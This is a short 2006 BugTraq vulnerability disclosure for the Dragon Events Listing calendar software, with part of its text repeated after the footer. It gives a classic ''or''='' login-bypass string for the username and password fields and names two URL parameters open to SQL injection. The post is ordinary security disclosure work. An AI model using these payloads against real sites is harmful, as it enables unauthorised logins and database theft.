BugTraq
Back to list
|
Post reply
Dragon calendar [ login bypass & injection sql ]
Nov 15 2006 03:27PM
saps audit gmail com
vendor site:http://www.dragoninternet.net/
product:Dragon Events Listing
bug:login bypass & injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (get)
http://site.com/event_searchdetail.asp?ID='[sql]
http://site.com/venue_detail.asp?VenueID='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
product:Dragon Events Listing
bug:login bypass & injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (get)
http://site.com/event_searchdetail.asp?ID='[sql]
http://site.com/venue_detail.asp?VenueID='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
[ reply ]